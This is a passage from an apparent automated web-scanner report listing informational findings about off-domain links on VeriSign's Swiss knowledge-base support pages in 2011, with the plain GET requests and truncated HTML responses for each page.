<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... </h4><a href="https://digitalid.verisign.com/services/client/renew.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> RENEW</a> <a href="https://digitalid.verisign.com/services/client/revoke.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> REVOKE</a> <a href="https://digitalid.verisign.com/services/client/replace.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> REPLACE</a> <a href="https://digitalid.verisign.com/services/client/index.html" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(255,255,255); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> SEARCH</a> <a 
href="https://digitalid.verisign.com/client/retrieve_id.htm" style="display: block; font-weight: bold; float: left; background-image: url(/library/VERISIGN/ALL_OTHER/yellow_button_75x24.gif); margin: 5px 10px 0pt 0pt; width: 75px; color: rgb(0,0,0); line-height: 24px; height: 24px; text-align: center; text-decoration: none"> RETRIEVE</a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.9. https://knowledge.verisign.ch/support/mpki-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/mpki-support/index.html
Issue detail
The page was loaded from a URL containing a query string: https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport
The response contains the following links to other domains:
Request
GET /support/mpki-support/index.html?tid=gnsupport HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:54 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... 
<div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... 
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... <br/> <a href="https://onsite-admin.verisign.com/OnSiteHome.htm"> <img src="apps/infocenter/resources/images/signin-button.gif" alt="Sign In"/>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.10. https://knowledge.verisign.ch/support/ssl-certificates-support/index
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/ssl-certificates-support/index
Issue detail
The page was loaded from a URL containing a query string: https://knowledge.verisign.ch/support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601
The response contains the following links to other domains:
Request
GET /support/ssl-certificates-support/index?page=content&actp=CROSSLINK&id=AR1601 HTTP/1.1
Host: knowledge.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:33 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitio...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... 
<div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... 
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... </a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.11. https://knowledge.verisign.ch/support/ssl-certificates-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/ssl-certificates-support/index.html
Issue detail
The page was loaded from a URL containing a query string:
https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport
The response contains the following links to other domains:
https://blogs.verisign.com/?tid=footer
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://ssl-certificate-center.verisign.com/process/retail/console_login
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://verisign.com/partnersupport/worldwide/partnersupport.html
https://www.verisign.be/
https://www.verisign.ch/?tid=header-logo
https://www.verisign.co.jp/
https://www.verisign.co.nz/
https://www.verisign.co.uk/
https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
https://www.verisign.com.au/
https://www.verisign.com.br/
https://www.verisign.com.hk/
https://www.verisign.com.sg/
https://www.verisign.com.tw/
https://www.verisign.com/
https://www.verisign.com/ar/
https://www.verisign.com/ca/
https://www.verisign.com/cl/
https://www.verisign.com/latinamerica/esp/
https://www.verisign.com/mx/
https://www.verisign.com/nl/
https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
https://www.verisign.com/rss/index.html?tid=footer
https://www.verisign.com/verisign-worldwide/index.html?tid=footer
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/
Request
GET /support/ssl-certificates-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:42:32 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... 
<div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg"> </a>...[SNIP]... 
<li><a href="https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH"> VeriSign Trust Center Sign In</a>...[SNIP]... <li><a href="https://cc-admin.geotrust.com/geocenter/reseller/logon.do"> Code Signing Portal for Microsoft Windows Mobile Sign In</a>...[SNIP]... <li><a href="https://products.verisign.com/geocenter/reseller/logon.do"> VeriSign Partner Center Sign In</a>...[SNIP]... </a> <a href="https://securitycenter.verisign.com/celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP" style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none"> SEARCH</a>...[SNIP]... <br clear="left" /><a href="https://ssl-certificate-center.verisign.com/process/retail/console_login" style="background-image: url(/library/VERISIGN/ALL_OTHER/cran_button_75x24.gif); text-align: center; line-height: 24px; margin: 5px 10px 0pt 0pt; width: 75px; display: block; float: left; height: 24px; color: rgb(255,255,255); font-weight: bold; text-decoration: none"> SIGN IN</a>...[SNIP]... <li><a href="//blogs.verisign.com/?tid=footer"> Blogs</a>...[SNIP]... <li><a href="//www.verisign.com/verisign-worldwide/index.html?tid=footer"> Worldwide Sites</a>...[SNIP]... <li> <a href="//www.verisign.com/rss/index.html?tid=footer"> RSS</a>...[SNIP]... </a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html"> two-factor authentication</a>, <a href="//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html"> identity protection</a>...[SNIP]... 
</a> and <a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> public key infrastructure</a> (<a href="//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html"> PKI</a>...[SNIP]...
14.12. https://knowledge.verisign.ch/support/trust-seal-support/index.html
Summary
Severity: Information
Confidence: Certain
Host: https://knowledge.verisign.ch
Path: /support/trust-seal-support/index.html
Issue detail
The page was loaded from a URL containing a query string:
https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport
The response contains the following links to other domains:
https://blogs.verisign.com/?tid=footer
https://cc-admin.geotrust.com/geocenter/reseller/logon.do
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg
https://products.verisign.com/geocenter/reseller/logon.do
https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH
https://trust-center.verisign.ch/process/retail/trust_console_login?application_locale=VTC_US
https://verisign.com/partnersupport/worldwide/partnersupport.html
https://www.verisign.be/
https://www.verisign.ch/?tid=header-logo
https://www.verisign.co.jp/
https://www.verisign.co.nz/
https://www.verisign.co.uk/
https://www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html
https://www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps
https://www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to
https://www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html
https://www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps
https://www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps
https://www.verisign.com.au/
https://www.verisign.com.br/
https://www.verisign.com.hk/
https://www.verisign.com.sg/
https://www.verisign.com.tw/
https://www.verisign.com/
https://www.verisign.com/ar/
https://www.verisign.com/ca/
https://www.verisign.com/cl/
https://www.verisign.com/latinamerica/esp/
https://www.verisign.com/mx/
https://www.verisign.com/nl/
https://www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo
https://www.verisign.com/rss/index.html?tid=footer
https://www.verisign.com/verisign-worldwide/index.html?tid=footer
https://www.verisign.com/vtcsslvideo/index.html
https://www.verisign.de/
https://www.verisign.dk/
https://www.verisign.es/
https://www.verisign.fr/
https://www.verisign.in/
https://www.verisign.it/
https://www.verisign.se/
https://www.verisignchina.com.cn/
Request
GET /support/trust-seal-support/index.html?tid=gnpsupport HTTP/1.1 Host: knowledge.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Fri, 09 Sep 2011 21:43:01 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://w...[SNIP]... <p id="site_logo"> <a title="Now from Symantec - VeriSign Authentication Services" href="//www.verisign.ch/?tid=header-logo"> <img src="/apps/infocenter/sites/verisign/images/symc-auth_logo.png">...[SNIP]... <li><a href="//www.verisign.com/ar/"> Argentina</a>...[SNIP]... <li><a href="//www.verisign.com.au/"> Australia</a>...[SNIP]... <li><a href="//www.verisign.be/"> Belgium</a>...[SNIP]... <li><a href="//www.verisign.com.br/"> Brazil</a>...[SNIP]... <li><a href="//www.verisign.com/ca/"> Canada</a>...[SNIP]... <li><a href="//www.verisign.com/cl/"> Chile</a>...[SNIP]... <li><a href="//www.verisignchina.com.cn/"> China</a>...[SNIP]... <li><a href="//www.verisign.dk/"> Denmark</a>...[SNIP]... <li><a href="//www.verisign.fr/"> France</a>...[SNIP]... <li><a href="//www.verisign.de/"> Germany</a>...[SNIP]... <li><a href="//www.verisign.com.hk/"> Hong Kong</a>...[SNIP]... <li><a href="//www.verisign.in/"> India</a>...[SNIP]... <li><a href="//www.verisign.it/"> Italy</a>...[SNIP]... <li><a href="//www.verisign.co.jp/"> Japan</a>...[SNIP]... <li><a href="//www.verisign.com/latinamerica/esp/"> Latin America</a>...[SNIP]... <li><a href="//www.verisign.com/mx/"> Mexico</a>...[SNIP]... <li><a href="//www.verisign.com/nl/"> Netherlands</a>...[SNIP]... <li><a href="//www.verisign.co.nz/"> New Zealand</a>...[SNIP]... <li><a href="//www.verisign.com.sg/"> Singapore</a>...[SNIP]... <li><a href="//www.verisign.es/"> Spain</a>...[SNIP]... <li><a href="//www.verisign.se/"> Sweden</a>...[SNIP]... <li><a href="//www.verisign.com.tw/"> Taiwan</a>...[SNIP]... <li><a href="//www.verisign.com/"> United States</a>...[SNIP]... <li><a href="//www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... 
<div id="header_seal"> <script src="https://seal.verisign.com/getseal?host_name=knowledge.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en" type="text/javascript"> </script>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps"> Two-Factor Authentication</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps"> Public Key Infrastructure (PKI) Services</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps"> Digital IDs for Secure Email</a>...[SNIP]... <li><a href="//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to"> Detect Fraud Online</a>...[SNIP]... <a class="promo-link" href="http://www.verisign.ch/ssl/free-trial/index.html?tid=gnps-promo"> <img height="183" width="170" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg"> </a>...[SNIP]... <p class="small"> <a href="//verisign.com/partnersupport/worldwide/partnersupport.html" rel="external"> Email support for login help.</a>...[SNIP]... </div> <a class="promo-link" href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo"> <img height="231" width="170" alt="See all Featured SSL Partners" src="https://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg"> </a>...[SNIP]... <a class="promo-link" href="/support/ssl-certificates-support/index.html?tid=gnpsupport-promo"> <img height="183" width="170" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." 